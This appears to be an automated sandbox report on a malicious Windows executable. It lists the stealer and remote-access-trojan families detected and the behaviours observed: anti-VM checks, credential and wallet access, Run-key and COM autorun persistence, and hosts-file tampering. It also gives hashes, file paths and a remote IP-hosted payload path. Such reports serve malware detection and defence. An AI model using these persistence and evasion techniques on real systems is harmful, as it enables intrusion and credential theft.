Analysis Overview
SHA256
4731517b198414342891553881913565819509086b8154214462788c740b34c9
Threat Level: Known bad
The file 4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe was found to be: Known bad.
Malicious Activity Summary
Ammyyadmin family
Formbook
AgentTesla
NetSupport
Glupteba
FlawedAmmyy RAT
NanoCore
AmmyyAdmin payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Formbook payload
Stops running service(s)
Downloads MZ/PE file
Drops file in Drivers directory
Modifies Windows Firewall
Blocklisted process makes network request
Unexpected DNS network traffic destination
.NET Reactor proctector
Reads data files stored by FTP clients
Checks BIOS information in registry
UPX packed file
Registers COM server for autorun
Deletes itself
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
Executes dropped EXE
Drops startup file
Checks computer location settings
Reads user/profile data of local email clients
Adds Run key to start application
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Drops desktop.ini file(s)
Creates a large amount of network flows
Accesses Microsoft Outlook profiles
Enumerates connected drives
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks whether UAC is enabled
Drops Chrome extension
Looks up external IP address via web service
Manipulates WinMonFS driver.
Accesses Microsoft Outlook accounts
Drops file in System32 directory
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Checks for VirtualBox DLLs, possible anti-VM trick
Launches sc.exe
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Program crash
NSIS installer
Modifies registry class
Checks processor information in registry
Suspicious behavior: LoadsDriver
Delays execution with timeout.exe
Suspicious behavior: SetClipboardViewer
Uses Task Scheduler COM API
outlook_win_path
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
outlook_office_path
Suspicious use of SetWindowsHookEx
Script User-Agent
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Checks SCSI registry key(s)
Suspicious behavior: AddClipboardFormatListener
Suspicious use of FindShellTrayWindow
Runs net.exe
Runs ping.exe
Modifies data under HKEY_USERS
Suspicious behavior: MapViewOfSection
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-23 14:53
Signatures
AmmyyAdmin payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Ammyyadmin family
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-23 14:53
Reported
2023-11-23 15:39
Platform
win10v2004-20231020-en
Max time kernel
1828s
Max time network
2704s
Command Line
Signatures
AgentTesla
FlawedAmmyy RAT
Formbook
Glupteba
NanoCore
NetSupport
Suspicious use of NtCreateUserProcessOtherParentProcess
Formbook payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Downloads\2023-11-23-11\c4e7f8b515bb1affff353fc47f448d67656e8adad59e5124231d314266c12d64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\odspxhsojhsrcnhepqd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Program Files\Google\Chrome\updater.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stops running service(s)
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Downloads\2023-11-23-11\c4e7f8b515bb1affff353fc47f448d67656e8adad59e5124231d314266c12d64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\odspxhsojhsrcnhepqd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Downloads\2023-11-23-11\c4e7f8b515bb1affff353fc47f448d67656e8adad59e5124231d314266c12d64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\odspxhsojhsrcnhepqd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS5B40.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS5B40.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\2023-11-23-12\9c8162115273ea9afdba3d35d7451f45913ba9764ad626a4cbebc8e9eb734396.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\2023-11-23-07\0860dafaa3db5f440b61cea445c066dcbad2285512eb2962236ad1a8366bf527.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\jsmpdfixntgalfjwtuf.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\2023-11-22-05\e340efd16c8fc3ed295ec674e97bed2ec4bc1e2a14a8089537b03da23f0f47ff.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\2023-11-23-12\e9fdf47496f9c18b384c875b0ca6866df1074b2981e0ef95a4d9d01cb824b275.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\2023-11-23-10\3cbd732d1d9b72c12fd0b5338f6ea6417ec2d242f258fedab71fe48cdadccc2a.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\odspxhsojhsrcnhepqd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\2023-11-22-22\7ee5c994ac006822269f3fe52d67cee97f5f80850451691a0bb721dc70169bae.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smssc.lnk | C:\Users\Admin\Downloads\2023-11-23-07\0860dafaa3db5f440b61cea445c066dcbad2285512eb2962236ad1a8366bf527.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32\ = "C:\\Program Files\\Windows Media Player\\Media Renderer\\WordCount.dll" | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\CLSID\{1F927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\CLSID\{2E927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32\ = "C:\\Program Files\\Windows Media Player\\Media Renderer\\WordCount.dll" | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32\ = "C:\\Program Files\\Windows Media Player\\Media Renderer\\WordCount.dll" | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\CLSID\{1F927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\CLSID\{2E927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 88.80.147.105 | N/A | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\WerFault.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Downloads\2023-11-23-07\09f3ffc4cf39c48f84b8eac7c29a49f9c1c576fd7c804a18374ee0e93d69bc37.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Downloads\2023-11-23-07\09f3ffc4cf39c48f84b8eac7c29a49f9c1c576fd7c804a18374ee0e93d69bc37.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Downloads\2023-11-23-12\2e1d8dd0bf1511be6665ac5739ae946357fd033b2e8bbac18ab1b9495c2eebfc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Downloads\2023-11-23-12\2e1d8dd0bf1511be6665ac5739ae946357fd033b2e8bbac18ab1b9495c2eebfc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Downloads\2023-11-23-12\2e1d8dd0bf1511be6665ac5739ae946357fd033b2e8bbac18ab1b9495c2eebfc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Downloads\2023-11-23-07\09f3ffc4cf39c48f84b8eac7c29a49f9c1c576fd7c804a18374ee0e93d69bc37.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\uqavfoktdyidm = "C:\\Users\\Admin\\AppData\\Roaming\\qvfbkgpyuen\\irnwgcl.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\ppxsvdjxm.exe\" " | C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MaxLoonaFest131 = "C:\\Users\\Admin\\AppData\\Local\\MaxLoonaFest131\\MaxLoonaFest131.exe" | C:\Users\Admin\Downloads\2023-11-22-05\595586e83cde2e83072b025e5199b451eed4a290b3cd7640c7e6df90ba364aa3.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NwYDfhR = "C:\\Users\\Admin\\AppData\\Roaming\\NwYDfhR\\NwYDfhR.exe" | C:\Users\Admin\Downloads\2023-11-23-12\42e0eda5412a988852e1cf9bb963422603d48777e94c5a19f77804213e1f50e6\NEW PO (YST2310-1010).exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NwYDfhR = "C:\\Users\\Admin\\AppData\\Roaming\\NwYDfhR\\NwYDfhR.exe" | C:\Users\Admin\Downloads\2023-11-23-12\c83c8ec888f8404ab18d2a3706bafc74a36fb3e05dd64b9c58efd610d67f82cf.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe\\svchost.exe.exe" | C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hv.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000078001\\hv.exe" | C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-V1UN0C = "\"C:\\Users\\Admin\\AppData\\Roaming\\update\\explorer.exe\"" | \??\UNC\62.173.141.116\scarica\paypal_inv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mirnwgclu = "C:\\Users\\Admin\\AppData\\Roaming\\pyienwscxh\\qmvfajfoxtd.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\cpqflwztt.exe\" " | C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-V1UN0C = "\"C:\\Users\\Admin\\AppData\\Roaming\\update\\explorer.exe\"" | \??\UNC\62.173.141.116\scarica\paypal_inv.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DOS Manager = "C:\\Program Files (x86)\\DOS Manager\\dosmgr.exe" | C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe | N/A |
